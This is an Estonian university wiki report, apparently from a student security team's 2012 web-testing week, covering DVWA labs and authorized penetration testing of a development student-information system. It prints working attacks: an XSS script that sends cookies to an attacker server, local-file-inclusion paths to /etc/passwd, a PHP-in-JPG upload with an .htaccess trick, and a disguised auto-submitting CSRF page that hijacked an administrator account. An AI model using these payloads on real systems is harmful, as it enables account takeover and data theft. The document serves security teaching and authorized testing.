Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
:Alo Konno A21
:Urmo Lihten A21
:Taavi Podžuks A22
:Matis Alliksoo A22
:Sander Saarm A22

== Juhendajad ==
Täname oma juhendajaid:
:Mart Mangus
:Margus Ernits
:Valter Kungla

Security team

2012-03-30T21:04:00Z

Ulihten: /* Tegijad */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===
==== Acunetix Web Vulnerability Scanner v. 8 automaatskännimise tööriistaga tutvumine ====
http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.

Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.

Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
